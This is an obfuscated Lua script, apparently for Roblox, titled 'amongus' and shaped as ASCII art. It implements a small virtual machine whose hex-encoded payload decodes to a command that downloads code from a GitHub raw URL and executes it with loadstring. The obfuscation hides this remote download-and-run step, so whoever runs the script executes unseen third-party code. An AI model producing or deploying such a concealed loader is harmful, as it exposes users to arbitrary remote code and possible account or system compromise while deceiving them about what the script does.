-- amongus

                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==79) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v90=0;local v91;while true do if (v90==0) then v91=v2(v0(v30,16) 
                                                  );if v19 then local v129=0;local v130;while true do if (v129==1) then return v130;end if (v129==0 
                                                  ) then v130=v5(v91,v19);v19=nil;v129=1;end end else return v91;end break;end end end end);local     
                                                function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(( 
                                                (v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v92-(v92%(932 -(857 + 74))) ;else local v93=568 -(   
                                              367 + 201) ;local v94;while true do if ((927 -(214 + 713))==v93) then v94=2^(v32-(1 + 0)) ;return (((v31%(v94 
                                               + v94))>=v94) and (1 + 0)) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=0 + 0 ;   
                                            local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + ((4641 -3575) -(68 + 997)) ;v34=1;end 
                                             if (v34==(1271 -(226 + (1161 -(32 + 85))))) then return v35;end end end local function v22() local v36=0 + 0 ;     
                                          local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * ((1732 -1296) -(67 + 113))) + v37 ;end if (v36== 
                                          (952 -(802 + 150))) then v37,v38=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;v36=(2 -1) -0 ;end end end local  
                                          function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * ( 
                                          (29811521 -13033308) -(915 + 82))) + (v42 * ((184086 + 1484) -120034)) + (v41 * (150 + 106)) + v40 ;end if (v39==((0 + 0) - 
                                        0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (1190 -(1069 + 118)) );v18=v18 + (8 -4) ;v39=1 -0 ;end end end local function v24()   
                                        local v44=791 -(368 + 423) ;local v45;local v46;local v47;local v48;  --[[==============================]]local v49;local v50;    
                                        while true do if (((1080 -(1020 + 60)) -0)==v44) then v45=  --[[============================================]]v23();v46=v23();v44 
                                        =1;end if ((20 -(10 + 8))==v44) then v49=v20(v46,80 -59 --[[======================================================]] ,473 -(416 +   
                                      26) );v50=((v20(v46,(1525 -(630 + 793)) -70 )==(1 + 0 --[[==========================================================]])) and  -(1 -0))  
                                      or (439 -(145 + 293)) ;v44=433 -(44 + 386) ;end if  --[[==============================================================]](v44==(1489 -(  
                                      998 + 488))) then if (v49==(0 + 0)) then if (v48==( --[[================================================================]]0 + 0)) then    
                                      return v50 * (772 -(201 + 571)) ;else v49=1;v47=0;  --[[==================================================================]]end elseif (  
                                      v49==(6936 -4889)) then return ((v48==((5388 -4250) --[[==================================================================]] -(116 + 1022))   
                                    ) and (v50 * ((4 -3)/(0 + 0)))) or (v50 * NaN) ;end   --[[====================================================================]]return v8(v50 
                    ,v49-1023 ) * (v47 + (v48/((7 -5)^(184 -132)))) ;end if (v44==(860 -( --[[====================================================================]]814 + 45)))     
              then v47=(1 + 1) -1 ;v48=(v20(v46,1 + 0 ,8 + 12 ) * ((887 -(261 + (2148 -   --[[======================================================================]]1524)))^((    
            1803 -(760 + 987)) -24))) + v45 ;v44=2;end end end local function v25(v51)    --[[======================================================================]]local v52;if  
            not v51 then v51=v23();if (v51==(1913 -(1789 + 124))) then return "";end end  --[[======================================================================]]v52=v3(v16,   
        v18,(v18 + v51) -(767 -(745 + 21)) );v18=v18 + v51 ;local v53={};for v70=1 + 0 ,  --[[======================================================================]]#v52 do v53[  
        v70]=v2(v1(v3(v52,v70,v70)));end return v6(v53);end local v26=v23;local function  --[[======================================================================]]v27(...)      
      return {...},v12("#",...);end local function v28() local v54=(function() return     --[[======================================================================]]function(v95, 
      v96,v97,v98,v99,v100,v101,v102) local v95=(function() return 0;end)();local v96=(     --[[==================================================================]]function()      
      return;end)();local v98=(function() return;end)();while true do if (v95==(1990 -(582  --[[================================================================]]+ 1408))) then    
    local v126=(function() return 0;end)();local v127=(function() return;end)();while true  --[[==============================================================]]do if (v126==0)   
    then v127=(function() return 0 -0 ;end)();while true do if (v127~=0) then else v96=(      --[[==========================================================]]function() return   
    v97();end)();v98=(function() return nil;end)();v127=(function() return 1;end)();end if ((1  --[[====================================================]]-0)==v127) then v95=(   
    function() return  #"|";end)();break;end end break;end end end if (v95== #"]") then if (v96== --[[==============================================]] #"<") then v98=(function 
    () return v97()~=0 ;end)();elseif (v96==(7 -5)) then v98=(function() return v99();end)();elseif ( --[[====================================]]v96~= #"xxx") then else v98=( 
    function() return v100();end)();end v101[v102]=(function() return v98;end)();break;end end return v95 --[[========================]],v96,v97,v98,v99,v100,v101,v102;end;  
    end)();local v55=(function() return function(v103,v104,v105,v106,v107,v108,v109,v110,v111) local v112=(function() return 1824 -(1195 + 629) ;end)();local v103=(        
  function() return;end)();local v104=(function() return;end)();while true do local v121=(function() return 0 -0 ;end)();while true do if (v121~=0) then else if (v112==1 
  ) then local v131=(function() return 241 -(187 + 54) ;end)();while true do if (0~=v131) then else local v147=(function() return 0;end)();while true do if (v147~=0)   
  then else while true do if (v103~=0) then else v104=(function() return v105();end)();if (v106(v104, #"]", #"}")==(780 -(162 + 618))) then local v150=(function() return 
   0 + 0 ;end)();local v151=(function() return;end)();local v152=(function() return;end)();local v153=(function() return;end)();local v154=(function() return;end)();     
  while true do if (v150==(0 + 0)) then local v155=(function() return 0 -0 ;end)();local v156=(function() return;end)();while true do if ((0 -0)~=v155) then else v156=(  
  function() return 0 + 0 ;end)();while true do if (v156==(1636 -(1373 + 263))) then v151=(function() return 1000 -(451 + 549) ;end)();v152=(function() return nil;end)() 
  ;v156=(function() return 1;end)();end if (v156~=(1 + 0)) then else v150=(function() return 1 -0 ;end)();break;end end break;end end end if (v150~=(1 -0)) then else     
  local v157=(function() return 1384 -(746 + 638) ;end)();while true do if (v157~=(0 + 0)) then else v153=(function() return nil;end)();v154=(function() return nil;end)( 
  );v157=(function() return 1 -0 ;end)();end if (v157~=(342 -(218 + 123))) then else v150=(function() return 2;end)();break;end end end if (v150~=2) then else while true 
   do if (v151== #"/") then local v158=(function() return 1581 -(1535 + 46) ;end)();local v159=(function() return;end)();while true do if (v158==(0 + 0)) then v159=(     
  function() return 0 + 0 ;end)();while true do if (v159==(560 -(306 + 254))) then v154=(function() return {v107(),v107(),nil,nil};end)();if (v152==0) then local v166=(  
  function() return 0 -0 ;end)();local v167=(function() return;end)();while true do if ((1467 -(899 + 568))==v166) then v167=(function() return 0;end)();while true do if ( 
  v167~=0) then else v154[ #"xxx"]=(function() return v107();end)();v154[ #".com"]=(function() return v107();end)();break;end end break;end end elseif (v152== #":") then   
  v154[ #"xnx"]=(function() return v108();end)();elseif (v152==(2 + 0)) then v154[ #"nil"]=(function() return v108() -(2^16) ;end)();elseif (v152== #"19(") then local v174 
  =(function() return 0;end)();local v175=(function() return;end)();while true do if (v174==(0 -0)) then v175=(function() return 603 -(268 + 335) ;end)();while true do if  
  (v175==0) then v154[ #"91("]=(function() return v108() -((292 -(60 + 230))^16) ;end)();v154[ #"0836"]=(function() return v107();end)();break;end end break;end end end    
  v159=(function() return 1;end)();end if (v159==(573 -(426 + 146))) then v151=(function() return 2;end)();break;end end break;end end end if (v151==(0 + 0)) then local    
  v160=(function() return 0;end)();local v161=(function() return;end)();while true do if (v160==(1456 -(282 + 1174))) then v161=(function() return 811 -(569 + 242) ;end)() 
  ;while true do if (v161~=1) then else v151=(function() return  #":";end)();break;end if (v161~=(0 -0)) then else v152=(function() return v106(v104,2, #"19(");end)();v153 
  =(function() return v106(v104, #"?id=",1 + 5 );end)();v161=(function() return 1025 -(706 + 318) ;end)();end end break;end end end if (v151~= #"-19") then else if (v106(  
  v153, #"xnx", #"asd")== #" ") then v154[ #"http"]=(function() return v109[v154[ #"asd1"]];end)();end v110[v111]=(function() return v154;end)();break;end if (v151==2)     
  then local v163=(function() return 0;end)();local v164=(function() return;end)();while true do if (v163==(1251 -(721 + 530))) then v164=(function() return 0;end)();while 
   true do if (v164~=(1272 -(945 + 326))) then else v151=(function() return  #"-19";end)();break;end if ((0 -0)==v164) then if (v106(v153, #"~", #"]")== #"~") then v154[2  
  + 0 ]=(function() return v109[v154[702 -(271 + 429) ]];end)();end if (v106(v153,2 + 0 ,2)== #"~") then v154[ #"19("]=(function() return v109[v154[ #"nil"]];end)();end    
  v164=(function() return 1;end)();end end break;end end end end break;end end end break;end end return v103,v104,v105,v106,v107,v108,v109,v110,v111;end end end end end  
  if (v112~=(1500 -(1408 + 92))) then else local v132=(function() return 0;end)();local v133=(function() return;end)();while true do if ((1086 -(461 + 625))==v132) then  
  v133=(function() return 1288 -(993 + 295) ;end)();while true do if (v133==(1 + 0)) then v112=(function() return 1;end)();break;end if (v133~=(1171 -(418 + 753))) then  
    else v103=(function() return 0;end)();v104=(function() return nil;end)();v133=(function() return 1 + 0 ;end)();end end break;end end end break;end end end end;end)() 
    ;local v56=(function() return function(v113,v114,v115) local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if (v116~=(0 +  
    0)) then else v117=(function() return 0 + 0 ;end)();while true do if (0==v117) then v113[v114-#"|" ]=(function() return v115();end)();return v113,v114,v115;end end   
    break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function()   
      return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v72= #"[",v61 do FlatIdent_79536,Type,v21,   
      Cons,v24,v25,v62,v72=(function() return v54(FlatIdent_79536,Type,v21,Cons,v24,v25,v62,v72);end)();end v60[ #"91("]=(function() return v21();end)();for v73= #"{", 
      v23() do FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v62,v57,v73=(function() return v55(FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v62,v57,v73);end)();end for v74 
        = #"/",v23() do v58,v74,v28=(function() return v56(v58,v74,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[1770 -(1749 + 20) ];    
        local v68=v64[7 -(382 -(142 + 235)) ];local v69=v64[1 + 2 ];return function(...) local v75=v67;local v76=v68;local v77=v69;local v78=v27;local v79=2 -1 ;local  
        v80= -(581 -(361 + 219));local v81={};local v82={...};local v83=v12("#",...) -(1 + 0) ;local v84={};local v85={};for v118=413 -(15 + 398) ,v83 do if (v118>=v77 
          ) then v81[v118-v77 ]=v82[v118 + (4 -3) + 0 ];else v85[v118]=v82[v118 + 1 ];end end local v86=(v83-v77) + (1146 -(466 + 148 + 531)) ;local v87;local v88;   
            while true do v87=v75[v79];v88=v87[983 -(18 + 964) ];if ((v88<=((986 -(553 + 424)) -5)) or (3546<2322)) then if (v88<=(2 -1)) then if ((3244>1055) and (  
              v88==((3592 -1692) -(106 + 1794)))) then v85[v87[1 + 1 ]]();else do return;end end elseif (v88<=(1 + 1)) then v85[v87[5 -3 ]]=v66[v87[3]];elseif ((v88> 
                (7 -(4 + 0))) or (3313<=1778)) then local v141=114 -(4 + 110 + 0) ;local v142;while true do if (v141==(584 -(57 + 527))) then v142=v87[1429 -(41 +    
                  808 + 578) ];v85[v142]=v85[v142](v85[v142 + (104 -(17 + 86)) ]);break;end end else v85[v87[2 + 0 ]]=v87[6 -3 ];end elseif ((v88<=(1 + 1 + 4)) or  
                      (1421>=2104)) then if ((v88==(14 -9)) or (2082==4773)) then local v137=v87[168 -(122 + 44) ];v85[v137]=v85[v137](v85[v137 + ((1 + 0) -0) ]);  
                                  else v85[v87[6 -4 ]]();end elseif (v88<=(6 + 1)) then v85[v87[1553 -((2440 -1314) + 425) ]]=v66[v87[1 + 2 ]];elseif ((1812<=3249) 
                                       and (v88==((44 -28) -8))) then do return;end else v85[v87[67 -(30 + 35) ]]=v87[3 + 0 ];end v79=v79 + (2 -1) ;end end;end     
                                      return v29(v28(),{},v17)(...);end return v15(                                                                                 
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!023O00030A3O006C6F6164737472696E6703A23O007072696E74286C6F6164737472696E672867616D653A482O74704765742827682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F57686174616D616E666163656775792O312O302F4173646173646173642O2D2F41464743484A4B2D4A4B2F56534348644B4742472D253233322F5A584F484D4E42494445554A504752494B534C4B494C4E44472D253742253744272O29282O290A00053O0012023O00013O001209000100024O00043O000200022O00063O000100012O00083O00017O00",v9(),...);
